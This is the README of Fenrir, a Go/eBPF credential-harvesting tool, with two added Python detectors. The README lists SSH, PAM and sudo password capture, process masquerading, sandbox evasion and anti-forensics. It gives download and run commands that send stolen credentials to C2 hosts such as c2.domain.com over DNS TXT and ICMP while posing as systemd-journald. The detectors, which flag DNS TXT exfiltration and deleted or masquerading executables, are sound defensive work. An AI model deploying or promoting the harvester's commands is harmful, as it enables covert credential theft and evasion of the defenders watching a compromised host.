A Go-based credential harvesting framework that leverages eBPF for kernel-level monitoring and includes anti-detection capabilities.
- Memory-only operation: Runs entirely from RAM with no disk persistence
- Automatic cleanup: Process memory cleared on termination
- Runtime unlinking: Removes binary from filesystem while executing
- Zero forensic traces: No logs, temporary files, or disk artifacts
- Custom process naming: Masquerade as legitimate system processes
- PID management: Advanced process tree manipulation
- Runtime attribute modification: Dynamic process camouflage
- Parent process spoofing: Blend into expected process hierarchies
- Preflight security scanning: Detects 25+ security tools before execution
- Continuous environment monitoring: Real-time sandbox and VM detection
- Anti-forensics measures: Counters memory analysis and debugging
- Watchdog termination: Auto-destruct on hostile environment detection
- Encrypted communications: AES-256 encrypted data channels by default
- Covert exfiltration: DNS TXT and ICMP echo data embedding
- Multi-layer obfuscation: String encryption and control flow obfuscation
- Minimal network footprint: Blends with normal DNS/ICMP traffic
- SSH interception: Real-time capture of SSH password authentication
- PAM monitoring: Hooks into system authentication modules via uprobe
- File-based discovery: SSH keys, configuration files, credential stores
- sudo/su capture: Privilege escalation credential harvesting
- DNS TXT records: Embeds credential data in seemingly legitimate DNS queries
- ICMP echo tunneling: Hides data in ping packet payloads
- Encrypted transport: End-to-end encryption with custom key derivation
- Traffic mimicry: Patterns indistinguishable from normal network activity
- Command & Control: Full-featured C2 infrastructure (fenrir-channel)
- Web dashboard: Real-time credential management interface
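The DNS TXT channel listed above is the one a defender can look for in resolver query logs: long, high-entropy, never-repeating leftmost labels under a single zone, unlike ordinary TXT lookups (SPF, DMARC, domain verification). The detector below is an added example, not code from the Fenrir project; it assumes a simplified four-field log format (the sample is constructed) and treats the last two labels of a name as the zone.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver query log (not real traffic), one query per line:
# "<timestamp> <client> <qtype> <qname>"
SAMPLE_LOG = """\
2024-01-15T10:00:01Z 10.0.0.5 A www.example.org
2024-01-15T10:00:02Z 10.0.0.5 TXT 4a7f3c2e9b1d.k8s3m2x0q.c2.example.com
2024-01-15T10:00:03Z 10.0.0.5 TXT 9e1b7d0c5a2f.p1z8v4n6t7.c2.example.com
2024-01-15T10:00:04Z 10.0.0.7 TXT _dmarc.example.org
2024-01-15T10:00:05Z 10.0.0.5 TXT c3d8e2f1a6b0.w5y2u9r4s1.c2.example.com
2024-01-15T10:00:06Z 10.0.0.5 TXT f0a1b2c3d4e5.h3j6l9m2o5.c2.example.com
"""

def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for an empty string."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def parse_log(text: str):
    """Yield (client, qtype, qname) tuples from the constructed format."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            yield parts[1], parts[2].upper(), parts[3].lower().rstrip(".")

def find_txt_exfil(text: str, min_queries: int = 4, min_entropy: float = 3.0,
                   min_label_len: int = 10) -> dict:
    """Flag zones that receive repeated TXT queries whose leftmost label is
    long, high-entropy and never repeated: data carried in the query name,
    which legitimate TXT lookups (SPF, DMARC, verification) do not show."""
    per_zone = defaultdict(list)            # zone -> [(client, leftmost label)]
    for client, qtype, qname in parse_log(text):
        if qtype == "TXT":
            labels = qname.split(".")
            # Assumption: the last two labels are the registrable zone (no PSL).
            per_zone[".".join(labels[-2:])].append((client, labels[0]))
    flagged = {}
    for zone, entries in per_zone.items():
        labels = [lbl for _, lbl in entries]
        encoded = [l for l in labels
                   if len(l) >= min_label_len and shannon_entropy(l) >= min_entropy]
        if len(encoded) >= min_queries and len(set(labels)) == len(labels):
            flagged[zone] = {"queries": len(entries),
                             "clients": sorted({c for c, _ in entries})}
    return flagged
```

Thresholds are starting points; tune min_label_len and min_entropy against a baseline of your own resolver's TXT traffic before alerting on them.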
Download pre-built binaries from Releases:
# Download latest release (Linux x86_64)
wget https://github.com/tahaafarooq/fenrir/releases/latest/download/fenrir-linux-amd64
chmod +x fenrir-linux-amd64
# Download C2 receiver
wget https://github.com/tahaafarooq/fenrir/releases/latest/download/fenrir-channel-linux-amd64
chmod +x fenrir-channel-linux-amd64
# Verify checksum (recommended)
wget https://github.com/tahaafarooq/fenrir/releases/latest/download/checksums.txt
sha256sum -c checksums.txt
Available builds:
- fenrir-linux-amd64 - Standard Linux x86_64 build
- fenrir-linux-amd64-garbled - Obfuscated build
- fenrir-linux-arm64 - Linux ARM64 build
- fenrir-channel-linux-* - C2 receiver for the respective architecture
# Memory-only execution with encrypted exfiltration
sudo ./fenrir -volatile -key "op-2024-winter" -dns c2.domain.com -q
# Custom process name + multiple channels
sudo ./fenrir -name "systemd-resolved" -volatile -dns c2.example.com -echo target.domain.com -key "mission-key" -pam -fmon
# Persistent background operation
sudo ./fenrir -d -volatile -key "persistent-key" -dns c2.domain.com -watchdog -preflight
# C2 receiver with web dashboard
./fenrir-channel -dns c2.domain.com -key "op-2024-winter" -web :8443 -log /tmp/harvest.log
# Multi-channel receiver with ICMP
./fenrir-channel -dns c2.domain.com -icmp -key "mission-key" -web 127.0.0.1:8443
# View harvested credentials
fenrir decrypt -key "op-2024-winter" /tmp/harvest.enc
# Check agent status
fenrir status
# Clean termination
fenrir stop
Listing commands with the -h / -help flag
$ sudo ./fenrir -d -pam -volatile -key "testkey" -o /tmp/fenrir.txt -q
The command above runs fenrir from memory and daemonizes it into the background. The binary can be deleted afterwards; the process keeps running until the host is rebooted or the process is identified and killed. The logs are encrypted with the supplied key and saved to /tmp/fenrir.txt, which can later be decrypted with:
$ sudo ./fenrir decrypt -key "testkey" /tmp/fenrir.txt
The process can be identified with:
sudo ps aufx | grep 'fenrir'
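Once the agent is started with -name, grepping for 'fenrir' no longer finds it, so a responder has to look at what the kernel records rather than the process name. The scanner below is an added example, not code from the Fenrir project: it walks /proc and flags processes whose executable was unlinked while running (memfd-backed binaries show the same way) and processes named systemd-* whose binary does not live in an assumed allowlist of systemd directories. demo_tree() builds a constructed fake /proc so the logic can be exercised off a live host.

```python
import os
import tempfile

# Directories where a genuine systemd-* service binary is expected to live
# (constructed allowlist; adjust for your distribution).
SYSTEMD_DIRS = ("/usr/lib/systemd/", "/lib/systemd/")
DELETED = " (deleted)"

def inspect_process(proc_dir: str):
    """Return (exe, comm, reasons) for a single /proc/<pid> directory."""
    exe = os.readlink(os.path.join(proc_dir, "exe"))
    with open(os.path.join(proc_dir, "comm")) as fh:
        comm = fh.read().strip()
    reasons = []
    # Unlinked-at-runtime and memfd-backed binaries both resolve to "... (deleted)".
    if exe.endswith(DELETED):
        reasons.append("deleted_exe")
        exe = exe[:-len(DELETED)]
    # comm is what PR_SET_NAME rewrites; the exe link is what the kernel mapped.
    if comm.startswith("systemd-") and not exe.startswith(SYSTEMD_DIRS):
        reasons.append("systemd_name_outside_systemd_dir")
    return exe, comm, reasons

def scan_proc(proc_root: str = "/proc"):
    """Walk numeric entries under proc_root; kernel threads (no exe), pids
    that exit mid-scan and unreadable entries are skipped. Run as root so
    every process's exe link is readable."""
    findings = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            exe, comm, reasons = inspect_process(os.path.join(proc_root, entry))
        except OSError:
            continue
        if reasons:
            findings.append({"pid": int(entry), "exe": exe, "comm": comm, "reasons": reasons})
    return sorted(findings, key=lambda f: f["pid"])

def demo_tree() -> str:
    """Constructed fake /proc: one benign init and one suspicious process."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    for pid, exe, comm in (("1", "/usr/lib/systemd/systemd", "systemd"),
                           ("4242", "/opt/tools/agent" + DELETED, "systemd-journald")):
        d = os.path.join(root, pid)
        os.mkdir(d)
        os.symlink(exe, os.path.join(d, "exe"))      # dangling link is fine here
        with open(os.path.join(d, "comm"), "w") as fh:
            fh.write(comm + "\n")
    return root
```

On a live host run scan_proc() as root; a hit that also holds an open socket or a loaded BPF program is worth preserving (/proc/<pid>/exe is still readable and can be copied) before the process is killed.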
$ sudo ./fenrir -d -pam -volatile -name "systemd-journald" -key "testkey" -o /tmp/fenrir.txt -q -watchdog -preflight
On the server with fenrir:
sudo ./fenrir -d -pam -volatile -name "systemd-journald" -key "testkey" -echo c2.domain.com -o /tmp/fenrir.txt -q
On C2:
./fenrir-channel -key "testkey" -icmp -web :8443 -q
Fenrir leverages eBPF (extended Berkeley Packet Filter) for kernel-level monitoring without traditional rootkit signatures:
- Ring buffer events: High-performance kernel -> userspace data transfer
- Syscall tracing: Monitors read(), write(), openat() without ptrace overhead
- Multi-source correlation: Aggregates data from SSH, PAM, and file monitoring
- Zero kernel modifications: Uses in-tree eBPF capabilities only
- VM detection: VMware, VirtualBox, QEMU, KVM, Xen identification
- Container awareness: Docker, LXC, Kubernetes pod detection
- Sandbox evasion: Cuckoo, Joe Sandbox, hybrid analysis environments
- Security tool detection: 25+ tools including Wireshark, Sysdig, Falco, Tetragon
- Linux kernel: 5.4+ (eBPF CO-RE support required)
- Privileges: Root access for eBPF program loading
- Architecture: x86_64, ARM64 supported
- Dependencies: Minimal, uses only in-tree kernel features
AUTHORIZED TESTING ONLY: Fenrir is designed exclusively for legitimate security testing, penetration testing, and red team exercises with explicit authorization. Users are solely responsible for ensuring legal compliance.
Educational Purpose: This tool serves security research and educational objectives. Any malicious use is strictly prohibited and not supported.
No Warranty: Provided "as-is" under GPL v3. See LICENSE for full terms.
We welcome contributions from security researchers and developers:
git clone https://github.com/tahaafarooq/fenrir.git
cd fenrir
# Install dependencies (Linux/WSL2 required)
make headers # Fetches eBPF headers
make generate # Generates eBPF bytecode
make build # Compiles fenrir binary
# Build C2 receiver
make channel
- Issues: GitHub Issues
- License: GPL v3 - see LICENSE
If Fenrir has been helpful for your security research or penetration testing, consider supporting its development: